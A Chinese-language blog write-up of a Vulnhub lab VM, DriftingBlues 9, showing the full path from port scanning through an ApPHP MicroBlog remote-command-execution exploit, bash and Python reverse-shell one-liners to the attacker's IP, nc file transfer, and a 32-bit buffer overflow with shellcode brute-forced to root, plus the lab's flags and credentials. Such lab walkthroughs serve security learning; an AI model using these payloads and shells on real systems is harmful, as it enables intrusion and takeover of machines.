首页 > 其他分享 >【Vulnhub 靶场】【DriftingBlues: 9 (final)】【简单】【20210509】

【Vulnhub 靶场】【DriftingBlues: 9 (final)】【简单】【20210509】

时间:2023-11-30 21:16:12浏览次数:57  
标签:www clapton DriftingBlues debian Vulnhub input pcntl root final

1、环境介绍

靶场介绍https://www.vulnhub.com/entry/driftingblues-9-final,695/
靶场下载https://download.vulnhub.com/driftingblues/driftingblues9.ova
靶场难度:简单
发布日期:2021年05月09日
文件大小:738 MB
靶场作者:tasiyanci
靶场描述:get flags
打靶耗时:2+小时
打靶关键

  1. 版本漏洞查询 与 利用
  2. 缓存溢出提权(靶场内说指导书)

2、主机发现与端口扫描

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    3a:f9:d3:90:a4:64       (Unknown: locally administered)
192.168.56.45   08:00:27:72:14:c9       PCS Systemtechnik GmbH

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.288 seconds (111.89 hosts/sec). 2 responded
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.45
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-30 01:04 EST
Nmap scan report for 192.168.56.45
Host is up (0.00054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: ApPHP MicroBlog vCURRENT_VERSION
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: ApPHP MicroBlog
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34567/tcp   status
|   100024  1          52654/tcp6  status
|   100024  1          58354/udp6  status
|_  100024  1          58383/udp   status
34567/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:72:14:C9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 192.168.56.45

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.95 seconds
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap --script=vuln -p 80,111,34567 192.168.56.45
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-30 01:20 EST
Nmap scan report for 192.168.56.45
Host is up (0.00047s latency).

PORT      STATE  SERVICE
80/tcp    open   http
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
|_http-dombased-xss: Couldn·t find any DOM based XSS.
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-stored-xss: Couldn·t find any stored XSS vulnerabilities.
|_http-csrf: Couldn·t find any CSRF vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|   /admin/home.php: Possible admin folder
|   /backup/: Backup folder w/ directory listing
|   /rss.xml: RSS or Atom feed
|   /README.txt: Interesting, a readme.
|   /docs/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /include/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /license/: Potentially interesting folder
|   /page/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_  /styles/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
111/tcp   open   rpcbind
34567/tcp closed dhanalakshmi
MAC Address: 08:00:27:72:14:C9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 43.73 seconds

3、端口访问

3.1、80端口 - Web

image
image

  • 版本漏洞查询(可利用
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# searchsploit ApPHP 1.0.1
------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                           |  Path
------------------------------------------------------------------------- ---------------------------------
ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities                         | php/webapps/33030.txt
ApPHP MicroBlog 1.0.1 - Remote Command Execution                         | php/webapps/33070.py
------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
  • 页面信息收集
    • 是否说明要新增域名:vvmlist.github.io
hello all, erdal komurcu here. i regret to tell you that drifting blues tech is sold to vvmlist.github.io.
大家好,Erdal Komurcu 在这里。我很遗憾地告诉你,Drifting Blues Tech 被卖给了 vvmlist.github.io。
  • 尝试新增 hosts
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# cat /etc/hosts                                             
127.0.0.1       localhost
127.0.1.1       kali
......
192.168.56.45 vvmlist.github.io

image

3.2、111端口 - RPCBind

  • 漏洞查询
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# searchsploit rpcbind    
------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                           |  Path
------------------------------------------------------------------------- ---------------------------------
rpcbind - CALLIT procedure UDP Crash (PoC)                               | linux/dos/26887.rb
RPCBind / libtirpc - Denial of Service                                   | linux/dos/41974.rb
Wietse Venema Rpcbind Replacement 2.1 - Denial of Service                | unix/dos/20376.txt
------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

3.3、3456端口 - 不知道是个啥

4、ApPHP 漏洞利用

4.1、33070.py(成功)

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# searchsploit -m 33070.py
  Exploit: ApPHP MicroBlog 1.0.1 - Remote Command Execution
      URL: https://www.exploit-db.com/exploits/33070
     Path: /usr/share/exploitdb/exploits/php/webapps/33070.py
    Codes: OSVDB-106352, OSVDB-106351
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /root/soft/hack/33070.py
  • 查看使用方法
    • 根据代码特征判断Python环境:Python 2.7
    • 根据代码描述,使用方法:python 33070.py {URL主页地址}
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat 33070.py  
#!/usr/bin/python
import random
import hashlib
import urllib
from base64 import b64encode as b64
import sys
import re

# Exploit Title: Python exploit for ApPHP MicroBlog 1.0.1 (Free Version) - RCE
# Exploit Author: LOTFREE
# Version: ApPHP MicroBlog 1.0.1 (Free Version)
# EDB-ID: 33030

print "  -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-"
print "original exploit by Jiko : http://www.exploit-db.com/exploits/33030/"

if len(sys.argv) < 2:
    print "Usage: python {0} http://target/blog/index.php".format(sys.argv[0])
    sys.exit()
......
  • 切换Python环境,并执行脚本
    • 获取数据库用户密码:clapton : yaraklitepe
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# conda activate py27
                                                                                                           
(py27) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# python 33070.py http://vvmlist.github.io/index.php
  -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-
original exploit by Jiko : http://www.exploit-db.com/exploits/33030/
[*] Testing for vulnerability...
[+] Website is vulnerable

[*] Fecthing phpinfo
        PHP Version 5.6.40-0+deb8u12
        System   Linux debian 3.16.0-4-586 #1 Debian 3.16.51-2 (2017-12-03) i686
        Loaded Configuration File   /etc/php5/apache2/php.ini
        Apache Version   Apache/2.4.10 (Debian)
        User/Group   www-data(33)/33
        Server Root   /etc/apache2
        DOCUMENT_ROOT   /var/www/html
        PHP Version   5.6.40-0+deb8u12
        allow_url_fopen  On  On
        allow_url_include  Off  Off
        disable_functions  pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,  pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
        open_basedir   no value    no value
        System V Message based IPC   Wez Furlong
        System V Semaphores   Tom May
        System V Shared Memory   Christian Cartus

[*] Fetching include/base.inc.php
         <?php
           // DATABASE CONNECTION INFORMATION
           define('DATABASE_HOST', 'localhost');        // Database host
           define('DATABASE_NAME', 'microblog');        // Name of the database to be used
           define('DATABASE_USERNAME', 'clapton');      // User name for access to database
           define('DATABASE_PASSWORD', 'yaraklitepe');  // Password for access to database
           define('DB_ENCRYPT_KEY', 'p52plaiqb8');      // Database encryption key
           define('DB_PREFIX', 'mb101_');               // Unique prefix of all table names in the database
        ?>

[*] Testing remote execution
[+] Remote exec is working with system() :)
Submit your commands, type exit to quit
> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

4.2、33030.txt(上面成功了,这个就不尝试了)

5、反弹链接

  • 尝试不同反弹命令(下面两条反弹失败)
> bash -c 'bash -i >& /dev/tcp/192.168.56.3/10086 0>&1'
> bash -i >& /dev/tcp/192.168.56.3/10086 0>&1
  • 反弹成功
> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.3",10086));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nc -lvnp 10086
listening on [any] 10086 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.45] 58345
bash: cannot set terminal process group (535): Inappropriate ioctl for device
bash: no job control in this shell
www-data@debian:/var/www/html$

6、信息收集

  • 获取用户:clapton
  • 前面获取了同用户名的 MySQL 密码,尝试切换用户
www-data@debian:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
statd:x:105:65534::/var/lib/nfs:/bin/false
messagebus:x:106:112::/var/run/dbus:/bin/false
mysql:x:107:114:MySQL Server,,,:/var/lib/mysql:/bin/false
clapton:x:1000:1000:,,,:/home/clapton:/bin/bash

7、尝试切换用户

  • 切换报错(是由于当前 shell 的问题)
www-data@debian:/var/www/html$ su clapton
su clapton
su: must be run from a terminal
  • 重新换一个 shell 就可以了
www-data@debian:/var/www/html$ SHELL=/bin/bash script -q /dev/null
SHELL=/bin/bash script -q /dev/null
www-data@debian:/var/www/html$ su clapton
su clapton
Password: yaraklitepe

clapton@debian:/var/www/html$

7.1、信息收集

clapton@debian:/var/www/html$ cd ~
cd ~
clapton@debian:~$ ls -al
ls -al
total 24
dr-x------ 2 clapton clapton 4096 May  9  2021 .
drwxr-xr-x 3 root    root    4096 May  9  2021 ..
-rwsr-xr-x 1 root    root    5150 Sep 22  2015 input
-rwxr-xr-x 1 root    root     201 May  9  2021 note.txt
-rw-r--r-- 1 clapton clapton   32 May  9  2021 user.txt
clapton@debian:~$ cat note.txt
cat note.txt
buffer overflow is the way. ( ͡° ͜ʖ ͡°)
缓冲区溢出是一种方法。( ͡° ͜ʖ ͡°)
if you·re new on 32bit bof then check these:
如果您是32位bof的新手,请检查以下内容:
https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.htm
  
  
clapton@debian:~$ cat user.txt
cat user.txt
F569AA95FAFF65E7A290AB9ED031E04F

clapton@debian:~$ strings /home/clapton/input
strings /home/clapton/input
bash: strings: command not found
clapton@debian:~$ /home/clapton/input
/home/clapton/input
Syntax: /home/clapton/input <input string>

7.2、文件传出 与 解析

  • 文件传出
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# nc -nlvp 1234 > input   
listening on [any] 1234 ...
clapton@debian:~$ nc 192.168.56.3 1234 < /home/clapton/input
nc 192.168.56.3 1234 < /home/clapton/input
  • 文件解析
    • 发现未做限制的strcpy()函数
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# strings ./input   
/lib/ld-linux.so.2
,x!L
libc.so.6
_IO_stdin_used
strcpy
exit
printf

8、缓存溢出命令构造 与 提权

8.1、检测 ALSR 防溢出设置(启动了防溢出)

  • 0:关闭。
  • 1:半随机。共享库、栈、mmap() 以及 VDSO 将被随机化。
  • 2:全随机。
clapton@debian:~$ cat /proc/sys/kernel/randomize_va_space
cat /proc/sys/kernel/randomize_va_space
2

8.2、payload 构造

  • 用 metasploit 中的 pattern_create.rb 生成数量 1000 的字符串用来计算偏移量
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9A......
  • 文件授权
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# chmod +x input
  • 将生成的字符串用命令 r 在 gdb 中运行,如下,程序报错,显示在这个地址出现错误:0x41376641
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# gdb -q ./input 
Reading symbols from ./input...
(No debugging symbols found in ./input)
(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9A......
Starting program: /root/soft/hack/input Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9A......
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x41376641 in ?? ()
(gdb) exit
A debugging session is active.

        Inferior 1 [process 13527] will be killed.

Quit anyway? (y or n) y
  • 计算下此地址:0x41376641 的偏移量
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x41376641
[*] Exact match at offset 171
  • 获取 payload 需要的值:0xbfc32640
clapton@debian:~$ gdb -q /home/clapton/input
gdb -q /home/clapton/input
Reading symbols from /home/clapton/input...(no debugging symbols found)...done.

# 计算出偏移量是 171,用 python 构造字符串;0x42424242
(gdb) r $(python -c 'print("A" * 171 + "B" * 4 + "\x90" * 64 )')
Starting program: /home/clapton/input $(python -c 'print("A" * 171 + "B" * 4 + "\x90" * 64 )')

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

# 查看ESP寄存器的值;0xbfc32640
(gdb) x/s $esp
0xbfc32640:     '\220' <repeats 64 times>
(gdb) q
A debugging session is active.

        Inferior 1 [process 21267] will be killed.

Quit anyway? (y or n) y
  • 用 ESP 寄存器的 0xbfc32640 替换 4 个 B,因为是小字节序,倒过来写,构造 payload
    • 至于怎么构造的,我也不是很清楚,需要有汇编语言基础,按道理来讲,应该是通用的
$(python -c 'print("A" * 171 + "\x40\x26\xc3\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')
  • 最后完整命令
/home/clapton/input $(python -c 'print("A" * 171 + "\x40\x26\xc3\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')

8.3、提权

  • 由于靶机启动了ALSR,于是使用循环
    • 此处尝试美化命令行,但是美化后,就失去了root权限
clapton@debian:~$ for i in {1..10000}; do (/home/clapton/input $(python -c 'print("A" * 171 + "\x40\x26\xc3\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')); done
<\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')); done
Segmentation fault
Segmentation fault
......
# SHELL=/bin/bash script -q /dev/null
SHELL=/bin/bash script -q /dev/null
bash-4.3$ id
id
uid=1000(clapton) gid=1000(clapton) groups=1000(clapton)
bash-4.3$ exit
exit
exit
# id
id
uid=1000(clapton) gid=1000(clapton) euid=0(root) groups=1000(clapton)
# id
id
uid=1000(clapton) gid=1000(clapton) euid=0(root) groups=1000(clapton)
# cd /root
cd /root
# ls -al
ls -al
total 16
drwx------  2 root root 4096 May  9  2021 .
drwxr-xr-x 21 root root 4096 May  9  2021 ..
-rw-------  1 root root  649 May  9  2021 .bash_history
-rw-r--r--  1 root root  295 May  9  2021 root.txt
# cat root.txt
cat root.txt
   
this is the final of driftingblues series. i hope you·ve learned something from them.

you can always contact me at vault13_escape_service[at]outlook.com for your questions. (mail language: english/turkish)

your root flag:

04D4C1BEC659F1AA15B7AE731CEEDD65

good luck. ( ͡° ͜ʖ ͡°)

标签:www,clapton,DriftingBlues,debian,Vulnhub,input,pcntl,root,final
From: https://www.cnblogs.com/NGC-2237/p/17868334.html

相关文章

  • Vulnhub DomDom-1(靶机玩乐2023-11-30)
    靶机下载地址:https://www.vulnhub.com/entry/domdom-1,328/第一步:扫一下同网段接口IP: 第二步:nmap扫描版本端口详细信息并输出  第三步:访问80端口服务 第四步:简单做做dirb目录遍历,也可以安装gobuster等做目录扫描:https://blog.csdn.net/qq_22597955/article/details......
  • 【Vulnhub 靶场】【Coffee Addicts: 1】【简单-中等】【20210520】
    1、环境介绍靶场介绍:https://www.vulnhub.com/entry/coffee-addicts-1,699/靶场下载:https://download.vulnhub.com/coffeeaddicts/coffeeaddicts.ova靶场难度:简单-中等发布日期:2021年5月20日文件大小:1.3GB靶场作者:BadByte靶场描述:我们的咖啡店被黑客入侵了!!你能修复......
  • JFinal框架入门版本
    项目结构具体代码//DemoConfig.javapackagecom.demo.config;importcom.demo.controller.HelloController;importcom.jfinal.config.*;importcom.jfinal.template.Engine;publicclassDemoConfigextendsJFinalConfig{@OverridepublicvoidconfigConst......
  • 求解--JFinal项目启动之后在浏览器显示不了的问题(未解决)
    问题描述问题解决......
  • JFinal具体如何划分?
    包的具体划分JFinal具体分为controller,config,model,Interceptor,service,validator这几类;各部分具体放什么东西(具体职责)controller--与spring的controller相似,放置具体操作;model--放置Student,定义核心代码;interceptor--拦截器,实现权限登录;service--所有的dao对象的定义放进去;v......
  • [HZNUCTF 2023 final]虽然他送了我玫瑰花
    打开界面看到爆红的代码 浏览整个代码没有发现明显的call指令爆红,那就只能慢慢看了发现一个地方出现永真跳转代码  这里的话直接给他nop掉就好了然后在上面选中mian函数p键就好了 另外想讲一下的点是这几个函数都是可以分析的 键入函数 F5变为伪代码 ......
  • try···finally执行
    代码publicstaticvoidmain(String[]args){System.out.println(test());}publicstaticinttest(){inta=1;try{returna;}finally{++a;}}打印结果print输出还是1......
  • Java中static、final、static final的区别
    finalfinal可以修饰:属性,方法,类,局部变量(方法中的变量)final修饰的属性的初始化可以在编译期,也可以在运行期,初始化后不能被改变。final修饰的属性跟具体对象有关,在运行期初始化的final属性,不同对象可以有不同的值。final修饰的属性表明是一个常数(创建后不能被修改)。final修饰的方......
  • EC-Final 2022 Rectangles
    有点营养的题。很容易做三条竖线,接下来考虑两竖一横。直接枚举横线会变成支持加入区间删除区间维护有多少种方案选择两个点使得任何区间至少包含其一。当然一个想法是线段树分治,以一只log的代价转化为只有加入,这个先放着。胡乱离散化一下,又可以转化为点带权但值域只有\(2n\)。......
  • final 和 static
    //1.final常量,需要在定义的时候进行初始化;每个对象的初始化不一样;//2.staticfinal常量可以在定义的时候初始化;也可以在static块中初始化;该种定义该类的对象使用的值一致。//3.被static修饰的变量,叫静态变量//4:静态区:方法区中一个模块,用于存放静态变量和静态代码块,也就是st......